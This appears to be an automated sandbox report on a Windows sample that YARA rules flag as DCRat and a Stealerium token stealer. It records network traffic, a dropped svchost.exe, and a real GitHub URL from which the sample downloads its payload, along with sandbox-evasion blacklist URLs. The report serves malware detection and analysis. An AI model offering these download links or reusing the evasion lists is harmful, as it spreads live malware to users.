Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: 41.140.13.0.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: svchost.exe, 00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: svchost.exe, 00000001.00000002.2946578084.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000001.00000002.2954494192.000000001BB40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c78eb1975523c
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.com
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64314000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.00000000036B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com
Source: Lu4421.exe | String found in binary or memory: https://github.com/kgnfth
Source: Lu4421.exe | String found in binary or memory: https://github.com/kgnfth/tumblr/raw/refs/heads/main/svchost.exe
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/kgnfth/tumblr/raw/refs/heads/main/svchost.exeP
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: Lu4421.exe | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/Machi
Source: Lu4421.exe | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/g
Source: Lu4421.exe | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/i
Source: Lu4421.exe | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_na
Source: Lu4421.exe | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_userna
Source: Lu4421.exe | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes
Source: Lu4421.exe | String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process information set: 01 00 00 00

System Summary

Source: Lu4421.exe, type: SAMPLE | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000001.00000002.2946463897.0000000001288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000001.00000002.2946578084.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: Lu4421.exe | Static PE information: section name:
Source: Lu4421.exe | Static PE information: section name: .idata
Source: Lu4421.exe | Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 1_2_00007FFD9B7D7418 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 1_2_00007FFD9B7D8708 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_011AC0A0
Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_011AF5A5
Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_00007FFD9B7FAB70
Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_00007FFD9B7F8B52
Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_00007FFD9B7F7DA6
Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_00007FFD9B7FF25A
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 1_2_00007FFD9B7DDBEF
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 1_2_00007FFD9B7D7418
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 1_2_00007FFD9B7D6B12
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 1_2_00007FFD9B7D5D66
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 1_2_00007FFD9B7D7D8D
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 1_2_00007FFD9B7D847E
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 1_2_00007FFD9B7D04B8
Source: C:\Users\user\Desktop\Lu4421.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6768 -s 2944
Source: Lu4421.exe, 00000000.00000002.2043257844.0000015B62540000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamestub.exe6 vs Lu4421.exe
Source: Lu4421.exe, 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamestub.exe6 vs Lu4421.exe
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesvchost.exej% vs Lu4421.exe
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesvchost.exej% vs Lu4421.exe
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B643C2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesvchost.exej% vs Lu4421.exe
Source: Lu4421.exe, 00000000.00000002.2042849629.0000015B62324000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Lu4421.exe
Source: Lu4421.exe | Binary or memory string: OriginalFilenamestub.exe6 vs Lu4421.exe
Source: Lu4421.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000001.00000002.2946463897.0000000001288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000001.00000002.2946578084.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: svchost.exe.0.dr, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, DInvokeCore.cs | Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: svchost.exe.0.dr, DInvokeCore.cs | Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, DInvokeCore.cs | Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/9@3/3
Source: C:\Users\user\Desktop\Lu4421.exe | File created: C:\Users\user\AppData\Local\267bb600791eee4c354dd856956b4399
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\etb3t1tr5n
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6768
Source: C:\Users\user\Desktop\Lu4421.exe | Mutant created: \Sessions\1\BaseNamedObjects\6617MJ9BAV2LEI4BHN6F
Source: C:\Users\user\Desktop\Lu4421.exe | File created: C:\Users\user\AppData\Local\Temp\Stealerium-Latest.log
Source: Lu4421.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
Source: C:\Users\user\Desktop\Lu4421.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Lu4421.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Lu4421.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Lu4421.exeReversingLabs: Detection: 68%
                        Source: Lu4421.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: Lu4421.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                        Source: C:\Users\user\Desktop\Lu4421.exeFile read: C:\Users\user\Desktop\Lu4421.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Lu4421.exe "C:\Users\user\Desktop\Lu4421.exe"
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6768 -s 2944
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: winrnr.dllJump to behavior
